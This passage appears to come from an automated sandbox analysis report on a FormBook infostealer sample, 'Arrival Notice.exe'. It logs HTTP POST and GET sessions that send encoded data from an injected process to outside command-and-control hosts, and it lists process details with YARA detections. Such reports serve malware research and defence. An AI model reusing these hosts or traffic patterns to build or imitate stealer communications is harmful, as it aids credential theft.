                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                30192.168.2.46190491.195.240.19804544C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe
                TimestampBytes transferredDirectionData
                Aug 19, 2024 04:29:20.267699957 CEST792OUTPOST /tf44/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.gipsytroya.com
                Origin: http://www.gipsytroya.com
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 219
                Referer: http://www.gipsytroya.com/tf44/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Raw: 6c 48 3d 2b 46 4b 67 62 50 42 6e 79 56 6f 6b 36 45 76 32 45 4b 34 55 2f 4d 54 48 72 68 36 59 57 4c 77 42 6f 6e 56 54 76 35 46 46 58 31 71 36 58 69 39 4e 6c 35 4e 58 4b 33 32 59 63 36 4d 46 4c 32 54 70 64 68 4f 77 58 4a 39 47 76 2f 39 77 37 6c 67 37 35 2f 44 4a 33 2f 76 39 64 4f 59 48 63 70 6e 51 48 78 4b 50 6c 45 6c 76 45 7a 4b 30 66 69 4a 66 57 32 47 4c 6d 6a 59 57 35 73 69 4f 57 7a 2f 2b 52 54 61 67 64 2f 46 46 42 52 38 71 4f 38 6c 4d 6e 39 31 2b 57 64 4a 45 61 63 68 4a 6f 5a 72 33 47 71 2b 61 6d 39 78 4b 64 69 2b 63 36 4e 58 37 37 78 4c 56 58 56 45 54 34 38 34 66 4c 6e 46 58 62 6b 76 46 64 6f 5a 2b 54 33 4d 4c 36 57 4d 37 49 30 70 49 4a 4a 77 3d
                Data Ascii: lH=+FKgbPBnyVok6Ev2EK4U/MTHrh6YWLwBonVTv5FFX1q6Xi9Nl5NXK32Yc6MFL2TpdhOwXJ9Gv/9w7lg75/DJ3/v9dOYHcpnQHxKPlElvEzK0fiJfW2GLmjYW5siOWz/+RTagd/FFBR8qO8lMn91+WdJEachJoZr3Gq+am9xKdi+c6NX77xLVXVET484fLnFXbkvFdoZ+T3ML6WM7I0pIJJw=
                Aug 19, 2024 04:29:20.919342041 CEST707INHTTP/1.1 405 Not Allowed
                date: Mon, 19 Aug 2024 02:29:20 GMT
                content-type: text/html
                content-length: 556
                server: Parking/1.0
                connection: close
                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                31192.168.2.46190591.195.240.19804544C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe
                TimestampBytes transferredDirectionData
                Aug 19, 2024 04:29:22.832972050 CEST10874OUTPOST /tf44/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.gipsytroya.com
                Origin: http://www.gipsytroya.com
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 10299
                Referer: http://www.gipsytroya.com/tf44/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Raw: 6c 48 3d 2b 46 4b 67 62 50 42 6e 79 56 6f 6b 36 45 76 32 45 4b 34 55 2f 4d 54 48 72 68 36 59 57 4c 77 42 6f 6e 56 54 76 35 46 46 58 30 53 36 58 78 31 4e 6b 61 56 58 4c 33 32 59 43 4b 4d 45 4c 32 54 30 64 6c 69 4b 58 4a 35 57 76 39 31 77 36 47 34 37 2f 4f 44 4a 2b 2f 76 39 41 65 59 47 42 35 6d 4b 48 77 36 31 6c 45 31 76 45 7a 4b 30 66 6a 35 66 57 69 53 4c 6b 6a 59 58 38 63 69 43 48 6a 2f 57 52 51 72 56 64 2f 42 2f 43 69 45 71 4f 63 31 4d 6c 50 74 2b 64 64 4a 47 4a 73 68 52 6f 59 58 6f 47 75 57 34 6d 38 31 30 64 68 69 63 72 4d 72 69 6d 54 44 42 4e 31 4e 4f 72 64 49 70 50 56 39 57 65 48 7a 46 51 64 46 59 47 57 77 64 30 32 39 7a 53 52 39 4a 63 4a 32 2b 37 41 38 69 6d 54 53 4a 6e 47 4d 59 56 30 2f 65 76 49 79 58 6d 37 6e 4d 54 39 6c 50 76 5a 39 65 5a 38 4c 75 4d 43 6d 59 36 4b 30 57 55 33 58 31 33 71 79 73 43 61 45 46 2f 34 76 59 78 72 41 49 64 59 31 6c 4f 56 52 48 31 4f 48 49 54 4c 44 34 61 4a 5a 6e 46 6b 4e 59 36 4a 52 73 63 52 67 71 6f 45 30 4b 48 41 77 36 6d 49 4c 31 47 6c 30 79 44 47 54 4b 76 56 67 [TRUNCATED]
                Data Ascii: lH=+FKgbPBnyVok6Ev2EK4U/MTHrh6YWLwBonVTv5FFX0S6Xx1NkaVXL32YCKMEL2T0dliKXJ5Wv91w6G47/ODJ+/v9AeYGB5mKHw61lE1vEzK0fj5fWiSLkjYX8ciCHj/WRQrVd/B/CiEqOc1MlPt+ddJGJshRoYXoGuW4m810dhicrMrimTDBN1NOrdIpPV9WeHzFQdFYGWwd029zSR9JcJ2+7A8imTSJnGMYV0/evIyXm7nMT9lPvZ9eZ8LuMCmY6K0WU3X13qysCaEF/4vYxrAIdY1lOVRH1OHITLD4aJZnFkNY6JRscRgqoE0KHAw6mIL1Gl0yDGTKvVgTBRnEyILfJ7GonCuCHn8OczepwOWW7WbCsvI3gPJK4ogHgBbZoMNFyBJVZy51HmU5chAg6EaSOauaR5X8Y4vO4FxKMAh1kY4l5OeInFjFhRwDC7LVRKQtaJzhs4rM7axpX6La/OZCaQ/LFXneh5VUIZ1YEJMNdRKVUxCXnv/u/uswFS0L5N8X8FfdMW9Sm9hWCOiXy7WD7/E/IiJRHXNvWECeH8mBZQmk+fMvwltu5m4bKWfqWdZIWeqQGFz+9BOLI4Cy8ArfItxOk9qtVhZ9h+yp7S4RRRW4PXlhWNNSXfmQfq9L3il3dUMME9CIdEW945wdRoTcd1bPINPriv7nYtjl6m1WuZhrqzkDXlNPiHkvr4jNim86EYR9EEyigX/0pJF7J/2zfvRMrlsWPMm7ar0/LLAAoHF6MQ3OszwGhEA7IyGYR7SPN5iP0fRV54d/KBxfLBWahuh+B/P0HEDYcKaMUUHBrcDcS1Y6ZGjd6i0jIuTa94bnexK2eFKcjKSJl52ZGlKK1NP9MhA5cipobQs1HOeFJonxDbx/OC2w8BbOAU5YQltez3Nl59P5iP14ReIbUtABDOlYPILTgLBe0ECeScv78RD6vjmuxXxmdsZX32ccwlqZ6MU0hHVV1Z6MHPYIlrHG9MnOS/njgIAAxKeXsw6N4VY7R [TRUNCATED]
                Aug 19, 2024 04:29:23.470873117 CEST707INHTTP/1.1 405 Not Allowed
                date: Mon, 19 Aug 2024 02:29:23 GMT
                content-type: text/html
                content-length: 556
                server: Parking/1.0
                connection: close
                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                32192.168.2.46190691.195.240.19804544C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe
                TimestampBytes transferredDirectionData
                Aug 19, 2024 04:29:25.373101950 CEST507OUTGET /tf44/?lH=zHiAY6EG+HxIxFu9b4tfleXF6yb9aKgM+W8Rr/tGfSzDPDxggLk9FyyADeImH3/ZYgS5WMd+vNhhyXlbnciywdLjC/RTAaKLEzmduXRfLlKkNxNmYFq4qCQ=&Cj=Qhv8RTO8YPvh6L30 HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Host: www.gipsytroya.com
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Aug 19, 2024 04:29:26.072212934 CEST113INHTTP/1.1 439
                date: Mon, 19 Aug 2024 02:29:25 GMT
                content-length: 0
                server: Parking/1.0
                connection: close


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                33192.168.2.461907104.21.45.56804544C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe
                TimestampBytes transferredDirectionData
                Aug 19, 2024 04:29:39.185808897 CEST769OUTPOST /lfkn/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.dmtxwuatbz.cc
                Origin: http://www.dmtxwuatbz.cc
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 199
                Referer: http://www.dmtxwuatbz.cc/lfkn/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Raw: 6c 48 3d 74 73 66 38 46 4e 69 49 70 4c 75 47 4a 48 55 48 78 52 38 59 45 36 38 77 4a 39 6f 58 65 47 77 6b 44 6e 52 69 4f 31 63 73 42 36 62 39 77 30 77 32 4e 35 37 46 30 41 63 67 51 67 52 6d 34 48 70 41 58 39 31 65 61 76 6d 4c 6c 2f 2b 50 42 66 75 45 39 51 5a 77 35 6a 43 42 32 76 7a 5a 30 6e 33 69 67 2f 79 66 76 61 43 37 4d 63 41 51 2b 7a 61 4e 4c 46 30 57 47 43 32 75 65 5a 44 76 58 77 71 6b 46 61 44 58 77 54 49 6b 4e 57 58 77 50 4d 35 48 6e 78 67 45 50 6c 44 2f 30 51 6a 74 72 35 34 79 44 7a 51 6a 6d 74 6d 37 50 4f 64 61 34 4f 77 70 6f 47 51 67 33 59 65 2f 37 2f 66 7a 54 32 5a 31 41 51 3d 3d
                Data Ascii: lH=tsf8FNiIpLuGJHUHxR8YE68wJ9oXeGwkDnRiO1csB6b9w0w2N57F0AcgQgRm4HpAX91eavmLl/+PBfuE9QZw5jCB2vzZ0n3ig/yfvaC7McAQ+zaNLF0WGC2ueZDvXwqkFaDXwTIkNWXwPM5HnxgEPlD/0Qjtr54yDzQjmtm7POda4OwpoGQg3Ye/7/fzT2Z1AQ==


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                34192.168.2.461908104.21.45.56804544C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe
                TimestampBytes transferredDirectionData
                Aug 19, 2024 04:29:41.716414928 CEST789OUTPOST /lfkn/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.dmtxwuatbz.cc
                Origin: http://www.dmtxwuatbz.cc
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 219
                Referer: http://www.dmtxwuatbz.cc/lfkn/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Raw: 6c 48 3d 74 73 66 38 46 4e 69 49 70 4c 75 47 4a 6d 6b 48 33 77 38 59 49 4b 38 2f 58 74 6f 58 58 6d 77 65 44 6e 64 69 4f 30 5a 72 41 49 76 39 77 56 41 32 4b 34 37 46 7a 41 63 67 59 41 52 76 38 48 70 39 58 39 78 67 61 74 43 4c 6c 2b 65 50 42 66 65 45 39 6e 4e 7a 34 7a 43 50 69 66 7a 66 77 6e 33 69 67 2f 79 66 76 61 47 46 4d 64 6f 51 69 53 71 4e 5a 55 30 56 61 79 32 68 49 4a 44 76 47 67 71 34 46 61 44 6c 77 58 41 43 4e 56 76 77 50 4f 78 48 6e 67 67 62 42 6c 44 35 71 67 69 76 69 35 64 51 42 44 5a 6f 6e 39 72 56 41 4d 4e 75 77 6f 68 7a 35 33 78 33 6c 59 36 4d 6d 34 57 48 65 31 6b 38 62 54 64 68 77 31 6a 70 2b 74 6f 76 4c 7a 44 76 79 2b 6e 43 43 62 6b 3d
                Data Ascii: lH=tsf8FNiIpLuGJmkH3w8YIK8/XtoXXmweDndiO0ZrAIv9wVA2K47FzAcgYARv8Hp9X9xgatCLl+ePBfeE9nNz4zCPifzfwn3ig/yfvaGFMdoQiSqNZU0Vay2hIJDvGgq4FaDlwXACNVvwPOxHnggbBlD5qgivi5dQBDZon9rVAMNuwohz53x3lY6Mm4WHe1k8bTdhw1jp+tovLzDvy+nCCbk=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                35192.168.2.461909104.21.45.56804544C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe
                TimestampBytes transferredDirectionData
                Aug 19, 2024 04:29:44.254338980 CEST10871OUTPOST /lfkn/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.dmtxwuatbz.cc
                Origin: http://www.dmtxwuatbz.cc
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 10299
                Referer: http://www.dmtxwuatbz.cc/lfkn/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Raw: 6c 48 3d 74 73 66 38 46 4e 69 49 70 4c 75 47 4a 6d 6b 48 33 77 38 59 49 4b 38 2f 58 74 6f 58 58 6d 77 65 44 6e 64 69 4f 30 5a 72 41 49 33 39 77 6e 49 32 4b 62 44 46 79 41 63 67 57 67 52 69 38 48 70 73 58 35 64 61 61 74 4f 62 6c 36 75 50 42 39 57 45 37 53 78 7a 32 7a 43 50 67 66 7a 61 30 6e 33 4e 67 2f 69 41 76 62 32 46 4d 64 6f 51 69 51 69 4e 61 46 30 56 4a 69 32 75 65 5a 44 7a 58 77 71 45 46 65 6d 51 77 58 4e 2f 4e 6b 50 77 50 75 68 48 6c 53 34 62 4a 6c 44 37 72 67 69 4e 69 35 68 6d 42 44 46 43 6e 2b 32 4f 41 4f 52 75 79 38 73 52 6c 7a 42 30 2f 4b 6d 76 6d 34 61 30 66 6d 45 36 58 45 56 48 2b 41 7a 76 68 65 49 57 44 78 7a 6b 33 4c 72 57 54 62 4a 75 77 70 38 33 5a 33 4e 4f 59 62 77 38 72 33 58 44 71 41 45 78 63 73 4e 6e 51 6d 55 76 59 72 47 39 39 53 47 6a 61 55 39 47 47 58 6e 34 65 4c 62 48 42 50 45 67 68 66 48 34 49 42 37 72 6b 61 78 57 33 6d 72 57 5a 57 69 2f 59 46 31 63 52 75 37 59 2f 62 4a 63 4a 68 79 46 62 54 5a 44 42 6e 2b 55 30 51 69 42 66 2f 52 76 62 58 61 75 34 50 4e 73 78 41 48 4a 54 30 42 [TRUNCATED]
                Data Ascii: lH=tsf8FNiIpLuGJmkH3w8YIK8/XtoXXmweDndiO0ZrAI39wnI2KbDFyAcgWgRi8HpsX5daatObl6uPB9WE7Sxz2zCPgfza0n3Ng/iAvb2FMdoQiQiNaF0VJi2ueZDzXwqEFemQwXN/NkPwPuhHlS4bJlD7rgiNi5hmBDFCn+2OAORuy8sRlzB0/Kmvm4a0fmE6XEVH+AzvheIWDxzk3LrWTbJuwp83Z3NOYbw8r3XDqAExcsNnQmUvYrG99SGjaU9GGXn4eLbHBPEghfH4IB7rkaxW3mrWZWi/YF1cRu7Y/bJcJhyFbTZDBn+U0QiBf/RvbXau4PNsxAHJT0B4EMIa9ZfzW01DxfFzZ6r0RX4/5hH1St9W01BIjSe8bgTUd3nHUn+tuYmg/ucZcMybVRBp5KP/91y45L1OXuthnjqy9KKpZvrIyq7Ki2EORYo1CcwLn2tr6/pYFN/YwjTVmQ+aRuwyfFDZBSgbPfqZk80KIQxAkR8X02Q4aLGsWH2phSyydG6xPWhm+Zg64kVQwnupGX+q+qqPl+ThfD2QoL51miY/+57uidmWr8Qz/6e/WaozNJLbtZsHIArN7oxSsFUADytqgUGbC98qx5hYk7U2tNvkvG/cYzY53GRgrYM2sAGRB1IcgVqRoCAUqSlQKZvvsxOY9IqoJLUXfDEVPUsjrIgXvO3Piz70JWGdUmTUY2zj1qDR2ScpGfypKyhtqMf8Rx6uDFkSAMEDmZpy+/2VBX00JWjqic5fzxuAltDxhDfhrkwcKLl13ul5oWk4dqYk1bbGU8MYS3pGMU2RVucW6Q8D/RV0unDMzTUPCPJB/2+TSleJ+zgdcfk3utst5sWwAzT/bDbLvTmwawRUVjvxL+AaWkm5kpmCtwa+UWppQUGJwj/iibIPbj3WwaaMqkJiGay+ttLcx407CrZ90SfpvPIMoR1ImiA0ArbEbAgvKXIKCt9TVWIx4364ILTavhqsNMr4xpoEcMbcmVtnc1w5KfzHlr2OU [TRUNCATED]


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                36192.168.2.461910104.21.45.56804544C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe
                TimestampBytes transferredDirectionData
                Aug 19, 2024 04:29:46.794259071 CEST506OUTGET /lfkn/?lH=gu3cG9GLpLv0C38b+jYCf7UBXt4URUEycVQhN1coGdiN+H1mAKnEyno+ahRh93ZPWIJTdN+wkaWXNdzclzMT+BORo/i7gxKdhtDjyoGaGd8n3Q21UEESNSU=&Cj=Qhv8RTO8YPvh6L30 HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Host: www.dmtxwuatbz.cc
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36


                Statistics

                CPU Usage

                Click to jump to process

                Memory Usage

                Click to jump to process

                High Level Behavior Distribution

                Click to dive into process behavior distribution

                Behavior

                Click to jump to process

                System Behavior

                General

                Target ID:0
                Start time:22:25:55
                Start date:18/08/2024
                Path:C:\Users\user\Desktop\Arrival Notice.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\Arrival Notice.exe"
                Imagebase:0x3b0000
                File size:1'287'680 bytes
                MD5 hash:F94FFBEA567A61ADE8409B8A854D6562
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low
                Has exited:true

                General

                Target ID:1
                Start time:22:25:56
                Start date:18/08/2024
                Path:C:\Windows\SysWOW64\svchost.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\Arrival Notice.exe"
                Imagebase:0x850000
                File size:46'504 bytes
                MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1863602986.0000000003680000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1863602986.0000000003680000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1864681477.0000000005C00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1864681477.0000000005C00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1863228024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1863228024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                Reputation:high
                Has exited:true

                General

                Target ID:2
                Start time:22:26:09
                Start date:18/08/2024
                Path:C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe
                Wow64 process (32bit):true
                Commandline:"C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe"
                Imagebase:0x980000
                File size:140'800 bytes
                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.4136078962.0000000004A80000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.4136078962.0000000004A80000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                Reputation:high
                Has exited:false

                General

                Target ID:3
                Start time:22:26:10
                Start date:18/08/2024
                Path:C:\Windows\SysWOW64\clip.exe
                Wow64 process (32bit):true
                Commandline:"C:\Windows\SysWOW64\clip.exe"
                Imagebase:0x690000
                File size:24'576 bytes
                MD5 hash:E40CB198EBCD20CD16739F670D4D7B74
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4134600469.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4134600469.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4136098252.0000000004E20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4136098252.0000000004E20000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4136001289.0000000003520000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4136001289.0000000003520000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                Reputation:moderate
                Has exited:false

                General

                Target ID:7
                Start time:22:26:23
                Start date:18/08/2024
